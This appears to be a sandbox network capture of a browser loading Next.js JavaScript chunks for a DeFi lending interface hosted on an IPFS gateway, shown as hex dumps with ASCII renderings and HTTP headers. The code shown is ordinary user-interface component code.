                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 38 38 32 2c 36 35 30 34 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 72 28 36 34 39 33 38 29 29 2c 69 3d 72 28 38 35 38 39 33 29 2c 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8882,6504],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 3a 22 31 65 6d 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61
                                                                                                                                                                                                                                                  Data Ascii: :"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.prima
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 6e 2e 74 6f 41 72 72 61 79 28 65 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 3b 72 65 74 75 72 6e 20 72 2e 72 65 64 75 63 65 28 28 28 65 2c 6e 2c 6f 29 3d 3e 28 65 2e 70 75 73 68 28 6e 29 2c 6f 3c 72 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 74 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 76 3d 28 30 2c 75 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65
                                                                                                                                                                                                                                                  Data Ascii: n.toArray(e).filter(Boolean);return r.reduce(((e,n,o)=>(e.push(n),o<r.length-1&&e.push(i.cloneElement(t,{key:`separator-${o}`})),e)),[])}const v=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{le
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 3b 74 2e 5a 3d 68 7d 2c 32 39 30 30 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 6f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 34 37 33 30 29 2c 69 3d 72 28 38 31 36 34 35 29 2c 73 3d 72 28 38 35 38 39 33 29 2c 61 3d 5b 22 73 78 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72
                                                                                                                                                                                                                                                  Data Ascii: ;t.Z=h},29002:function(e,t,r){r.d(t,{o:function(){return u}});var n=r(59499),o=r(4730),i=r(81645),s=r(85893),a=["sx"];function c(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){r
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 34 35 20 31 36 2e 38 31 32 32 43 31 38 2e 33 35 39 35 20 31 37 2e 31 38 37 32 20 31 37 2e 38 35 30 37 20 31 37 2e 33 39 38 20 31 37 2e 33 32 30 33 20 31 37 2e 33 39 38 5a 22 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 34 2e 38 32 30 33 20 31 31 2e 33 39 37 39 43 31 34 2e 36 38 37 37 20 31 31 2e 33 39 37 39 20 31 34 2e 35 36 30 35 20 31 31 2e 33 34 35 33 20 31 34 2e 34 36 36 38 20 31 31 2e 32 35 31 35 43 31 34 2e 33 37 33 20 31 31 2e 31 35 37 37 20 31 34 2e 33 32 30 33 20 31 31 2e 30 33 30 36 20 31 34 2e 33 32 30 33 20 31 30 2e 38 39 37 39 43 31 34 2e 33 32 30 33 20 31 30 2e 37 36 35 33 20 31 34 2e 33 37 33 20 31 30 2e 36 33 38 32 20 31 34 2e 34 36 36 38 20 31 30 2e 35 34 34 34 43 31 34 2e 35 36 30 35 20 31 30 2e 34 35 30
                                                                                                                                                                                                                                                  Data Ascii: 45 16.8122C18.3595 17.1872 17.8507 17.398 17.3203 17.398Z"}),(0,s.jsx)("path",{d:"M14.8203 11.3979C14.6877 11.3979 14.5605 11.3453 14.4668 11.2515C14.373 11.1577 14.3203 11.0306 14.3203 10.8979C14.3203 10.7653 14.373 10.6382 14.4668 10.5444C14.5605 10.450
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d
                                                                                                                                                                                                                                                  Data Ascii: bject.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function u(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 4e 75 6d 62 65 72 28 74 29 2c 78 3d 6e 75 6c 6c 21 3d 3d 6e 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 30 3b 30 3d 3d 3d 62 3f 78 3d 30 3a 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 78 3d 62 3e 31 7c 7c 6c 7c 7c 22 55 53 44 22 3d 3d 3d 72 3f 32 3a 37 29 3b 76 61 72 20 79 3d 4d 61 74 68 2e 70 6f 77 28 31 30 2c 2d 78 29 2c 67 3d 30 21 3d 3d 62 26 26 4d 61 74 68 2e 61 62 73 28 62 29 3c 4d 61 74 68 2e 61 62 73 28 79 29 2c 77 3d 67 3f 79 3a 62 2c 6a 3d 21 31 21 3d 3d 69 26 26 28 69 7c 7c 62 3e 39 39 39 39 39 29 3b 72 65 74 75 72 6e 20 66 26 26 21 6a 26 26 28 77 3d 4d 61 74 68 2e 74 72 75 6e 63 28 4e 75 6d 62 65 72 28 77 29 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 78 29 29 2f 4d 61 74 68 2e 70 6f 77 28 31 30 2c 78 29 29 2c 28 30 2c 61 2e 6a 73 78 73 29 28 73 2e 5a
                                                                                                                                                                                                                                                  Data Ascii: Number(t),x=null!==n&&void 0!==n?n:0;0===b?x=0:void 0===n&&(x=b>1||l||"USD"===r?2:7);var y=Math.pow(10,-x),g=0!==b&&Math.abs(b)<Math.abs(y),w=g?y:b,j=!1!==i&&(i||b>99999);return f&&!j&&(w=Math.trunc(Number(w)*Math.pow(10,x))/Math.pow(10,x)),(0,a.jsxs)(s.Z
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 3d 5b 22 73 79 6d 62 6f 6c 73 22 2c 22 62 61 64 67 65 53 79 6d 62 6f 6c 22 5d 2c 76 3d 5b 22 73 79 6d 62 6f 6c 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d 72 65
                                                                                                                                                                                                                                                  Data Ascii: =["symbols","badgeSymbol"],v=["symbol"];function h(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}re
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 66 29 29 29 29 29 7d 65 6c 73 65 7b 76 61 72 20 76 2c 68 3d 28 6e 65 77 20 58 4d 4c 53 65 72 69 61 6c 69 7a 65 72 29 2e 73 65 72 69 61 6c 69 7a 65 54 6f 53 74 72 69 6e 67 28 6e 75 6c 6c 3d 3d 3d 28 76 3d 6f 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 76 3f 76 6f 69 64 20 30 3a 76 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 3b 72 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55
                                                                                                                                                                                                                                                  Data Ascii: a:image/svg+xml;base64,".concat(window.btoa(unescape(encodeURIComponent(f)))))}else{var v,h=(new XMLSerializer).serializeToString(null===(v=o.current)||void 0===v?void 0:v.contentDocument);r("data:image/svg+xml;base64,".concat(window.btoa(unescape(encodeU


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  23192.168.2.549735209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC739OUTGET /_next/static/chunks/3866.777e7d128e9a4375.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:41 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 34035
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreibn6v52bzslcovuztjuw4q2bh7btgjlzkvi433le2q73otqjsatxi"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/3866.777e7d128e9a4375.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreibn6v52bzslcovuztjuw4q2bh7btgjlzkvi433le2q73otqjsatxi
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028475
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 31 30 66 62 32 31 38 35 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4110fb21851-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 38 36 36 5d 2c 7b 35 30 30 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 76 61 72 20 6e 3d 74 28 35 39 34 39 39 29 2c 6f 3d 74 28 34 37 33 30 29 2c 61 3d 74 28 39 31 36 35 35 29 2c 69 3d 74 28 33 30 31 32 30 29 2c 73 3d 74 28 32 39 36 33 30 29 2c 63 3d 28 74 28 36 37 32 39 34 29 2c 74 28 37 33 39 36 35 29 29 2c 6c 3d 74 28 34 31 30 32 34 29 2c 75 3d 74 28 38 35 38 39 33 29 2c 64 3d 5b 22 6d 69 6e 56 61 6c 22 2c 22 6d 61 78 56 61 6c 22 2c 22 70 65 72 63 65 6e 74 56 61 72 69 61 6e 74 22 2c 22 68 79 70 68 65 6e 56 61 72 69 61 6e 74 22 5d
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3866],{50020:function(e,r,t){var n=t(59499),o=t(4730),a=t(91655),i=t(30120),s=t(29630),c=(t(67294),t(73965)),l=t(41024),u=t(85893),d=["minVal","maxVal","percentVariant","hyphenVariant"]
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 3d 6e 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 22 68 33 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 79 22 7d 2c 6d 29 29 3a 28 30 2c 75 2e 6a 73 78 73 29 28 75 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 75 2e 6a 73 78 29 28 6c 2e 42 2c 78 28 7b 63 6f 6d 70 61 63 74 3a 21 30 2c 76 61 6c 75 65 3a 31 30 30 2a 79 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 21 3d 3d 6e 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 22 68 33 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 79 2d 67 68 6f 2d 66 72 6f 6d 22 7d 2c 6d 29 29 2c 28 30 2c 75 2e 6a 73 78 29 28 73 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 21 3d 3d 70 26 26 76 6f 69 64 20 30 21 3d 3d 70 3f 70 3a 22 73 65 63 6f 6e 64 61 72
                                                                                                                                                                                                                                                  Data Ascii: =n&&void 0!==n?n:"h3","data-cy":"apy"},m)):(0,u.jsxs)(u.Fragment,{children:[(0,u.jsx)(l.B,x({compact:!0,value:100*y,visibleDecimals:2,variant:null!==n&&void 0!==n?n:"h3","data-cy":"apy-gho-from"},m)),(0,u.jsx)(s.Z,{variant:null!==p&&void 0!==p?p:"secondar
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 2e 22 2c 76 61 6c 75 65 73 3a 7b 30 3a 43 3f 28 30 2c 76 2e 6a 73 78 73 29 28 76 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 76 2e 6a 73 78 29 28 64 2e 42 2c 7b 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 32 22 2c 76 61 6c 75 65 3a 5a 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 7d 29 2c 22 20 22 5d 7d 29 3a 6e 75 6c 6c 7d 7d 29 2c 22 20 22 2c 28 30 2c 76 2e 6a 73 78 29 28 70 2e 72 55 2c 7b 6f 6e 43 6c 69 63 6b 3a 6a 2c 68 72 65 66 3a 79 2c 75 6e 64 65 72 6c 69 6e 65 3a 22 61 6c 77 61 79 73 22 2c 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 32 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 4c 65 61 72 6e 20 6d 6f 72 65 22 7d 29 7d 29 5d 7d 29 7d 29 29 2c
                                                                                                                                                                                                                                                  Data Ascii: .",values:{0:C?(0,v.jsxs)(v.Fragment,{children:[(0,v.jsx)(d.B,{variant:"subheader2",value:Z,visibleDecimals:2})," "]}):null}})," ",(0,v.jsx)(p.rU,{onClick:j,href:y,underline:"always",variant:"subheader2",children:(0,v.jsx)(o.cC,{id:"Learn more"})})]})})),
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3a 7b 7d 3b 72 25 32 3f 6c 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 72 2c 74 5b 72 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 74 29 29 3a 6c 28 4f 62 6a 65 63 74 28 74 29 29 2e 66 6f 72 45 61 63 68 28 28 66
                                                                                                                                                                                                                                                  Data Ascii: (var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?l(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):l(Object(t)).forEach((f
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 74 29 29 3a 69 28 4f 62 6a 65 63 74 28 74 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 6f 2e 5a 2c 73 28 73 28 7b 7d 2c 65 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 22 5c 75 32 30 31 34 22 7d 29 29 7d 7d 2c 35 34 34 32 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 72 28 72 29 2c 74 2e 64 28 72 2c 7b 44 65 62 74 53 77 69 74 63 68 4d 6f 64
                                                                                                                                                                                                                                                  Data Ascii: pertyDescriptors(t)):i(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}var c=function(e){return(0,a.jsx)(o.Z,s(s({},e),{},{children:"\u2014"}))}},54423:function(e,r,t){t.r(r),t.d(r,{DebtSwitchMod
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 72 2e 63 6f 6c 6f 72 26 26 7b 63 6f 6c 6f 72 3a 22 69 6e 68 65 72 69 74 22 7d 2c 21 72 2e 64 69 73 61 62 6c 65 47 75 74 74 65 72 73 26 26 7b 70 61 64 64 69 6e 67 4c 65 66 74 3a 31 36 2c 70 61 64 64 69 6e 67 52 69 67 68 74 3a 31 36 7d 2c 72 2e 69 6e 73 65 74 26 26 7b 70 61 64 64 69 6e 67 4c 65 66 74 3a 37 32 7d 2c 21 72 2e 64 69 73 61 62 6c 65 53 74 69 63 6b 79 26 26 7b 70 6f 73 69 74 69 6f 6e 3a 22 73 74 69 63 6b 79 22 2c 74 6f 70 3a 30 2c 7a 49 6e 64 65 78 3a 31 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 62 61 63 6b 67 72 6f 75 6e 64 2e 70 61 70 65 72 7d 29 29 29 3b 76 61 72 20 43 3d 61 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 63 6f 6e 73 74 20 74
                                                                                                                                                                                                                                                  Data Ascii: r.color&&{color:"inherit"},!r.disableGutters&&{paddingLeft:16,paddingRight:16},r.inset&&{paddingLeft:72},!r.disableSticky&&{position:"sticky",top:0,zIndex:1,backgroundColor:(e.vars||e).palette.background.paper})));var C=a.forwardRef((function(e,r){const t
